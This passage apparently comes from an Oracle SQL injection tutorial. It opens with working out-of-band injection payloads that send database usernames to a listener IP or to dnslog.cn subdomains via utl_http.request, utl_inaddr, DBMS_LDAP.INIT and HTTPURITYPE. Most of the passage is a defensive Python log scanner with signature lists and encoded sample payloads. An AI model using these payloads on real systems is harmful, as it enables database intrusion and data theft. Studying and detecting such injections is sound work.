::ffff:192.168.110.142 - - [26/Aug/2021 17:36:10] "GET /id HTTP/1.1" 404 -
-- query data
SELECT * FROM "c1o2a3" WHERE "id" = '1' and utl_http.request('http://192.168.110.142:80/'||(select "username" from "c1o2a3" where rownum=1))=1 -- ' ;
::ffff:192.168.110.142 - - [26/Aug/2021 17:36:34] "GET /test2 HTTP/1.1" 404 -
2. utl_inaddr.get_host_address()
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select utl_inaddr.get_host_address((select user from dual)||'.vps2qs.dnslog.cn') from dual)is not null -- ' ;
-- the rest follows the same pattern
3. SYS.DBMS_LDAP.INIT()
Similar to utl_inaddr.get_host_address. The database server is very often separate from the web server and cannot necessarily reach the internet on its own, but DNS requests may still be allowed, and in 10g/11g this function is executable by PUBLIC.
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.h8armg.dnslog.cn',80) from dual)is not null -- ' ;
Throws an error but still works; pair it with a DNS logging service (Oracle 11g).
4. HTTPURITYPE()
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select HTTPURITYPE('http://192.168.110.142:8080/'||(select user from dual)).GETCLOB() FROM DUAL)is not null -- ' ;
Throws an error but still works.
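Every technique on this page (error-based, time-based, boolean blind, UNION and out-of-band) leaves Oracle-specific tokens in the request: from dual, rownum, DBMS_PIPE.RECEIVE_MESSAGE, utl_inaddr, ctxsys.drithsx.sn, XMLType, dbms_xdb_version, utl_http.request, DBMS_LDAP.INIT, HTTPURITYPE and so on. The following Python is an added example written from the detection side; it is not code from the original page. It parses combined-format web access log lines, URL-decodes the path (twice, to undo double encoding), strips the /**/ inline comments that are used in place of spaces, and classifies each request against signature groups named after the sections above. The log lines are constructed for the example, with the collector host written as a placeholder.

```python
import re
from urllib.parse import unquote_plus

# Signature groups, named after the sections of this page. Patterns are
# matched against the lower-cased, URL-decoded, comment-stripped request path.
SIGNATURES = {
    "error-based": [
        r"utl_inaddr\.", r"ctxsys\.drithsx\.sn", r"\bxmltype\s*\(",
        r"dbms_xdb_version\.", r"dbms_utility\.sqlid_to_sqlhash",
        r"ordsys\.ord_dicom\.",
    ],
    "time-based": [
        r"dbms_pipe\.receive_message", r"count\(\*\)\s*from\s+all_objects",
    ],
    "boolean-blind": [
        r"\bdecode\s*\(", r"\binstr\s*\(", r"\bsubstr\s*\(\s*user\b",
    ],
    "union": [r"\bunion\s+(?:all\s+)?select\b"],
    "oob": [
        r"utl_http\.request", r"utl_inaddr\.get_host_address",
        r"dbms_ldap\.init", r"\bhttpuritype\s*\(",
    ],
    "oracle-generic": [
        r"\bfrom\s+dual\b", r"\brownum\s*=", r"\buser_tables\b",
        r"\ball_tab_columns\b", r"v\$version", r"sys\.user\$",
    ],
}
COMPILED = {name: [re.compile(p) for p in pats] for name, pats in SIGNATURES.items()}

# Combined log format: client, identd, user, [timestamp], "request", status, size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def normalise(path: str) -> str:
    """Decode the request path the way the database would eventually see it."""
    text = path
    for _ in range(2):                      # undo single and double URL-encoding
        text = unquote_plus(text)
    text = re.sub(r"/\*.*?\*/", " ", text)  # /**/ is a common space substitute
    return re.sub(r"\s+", " ", text).lower()


def classify(path: str) -> list:
    """Return the sorted signature groups that match the request path."""
    text = normalise(path)
    return sorted(
        name for name, pats in COMPILED.items() if any(p.search(text) for p in pats)
    )


def scan_log(log_text: str) -> list:
    """Parse access-log lines and return one dict per flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                        # not combined format, skip it
        groups = classify(m["path"])
        if groups:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                         "path": m["path"], "groups": groups})
    return hits


def hits_per_client(hits: list) -> dict:
    """Count flagged requests per client address, for alert thresholds."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


# Constructed sample: one benign request and four payload shapes from this page
# (DBMS_PIPE delay, UNION, utl_http.request OOB, /**/-obfuscated UNION).
# collector.example is a placeholder host, not a real listener.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Aug/2021:17:27:27 +0800] "GET /item?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [26/Aug/2021:17:28:01 +0800] "GET /item?id=1%27%20and%201%3DDBMS_PIPE.RECEIVE_MESSAGE%28%271%27%2C5%29%20-- HTTP/1.1" 200 512
10.0.0.9 - - [26/Aug/2021:17:28:40 +0800] "GET /item?id=1%27%20union%20select%201%2C%28select%20user%20from%20dual%29%2Cnull%20from%20dual%20-- HTTP/1.1" 200 640
10.0.0.9 - - [26/Aug/2021:17:29:12 +0800] "GET /item?id=1%27%20and%20utl_http.request%28%27http%3A%2F%2Fcollector.example%2F%27%7C%7C%28select%20user%20from%20dual%29%29%3D1%20-- HTTP/1.1" 500 0
10.0.0.9 - - [26/Aug/2021:17:29:50 +0800] "GET /item?id=1%27/**/union/**/select/**/null,null,null/**/from/**/dual-- HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["groups"], normalise(hit["path"]))
    print(hits_per_client(scan_log(SAMPLE_LOG)))
```

Signature matching of this kind is a triage aid rather than a complete control: a single hit on "oracle-generic" is weak evidence on its own, while a burst of "time-based" or "boolean-blind" hits from one client, or any "oob" hit paired with outbound DNS or HTTP from the database host, is what a responder should page on. The 500 status on the utl_http.request line is the other signal worth correlating, since error-based techniques deliberately provoke database errors.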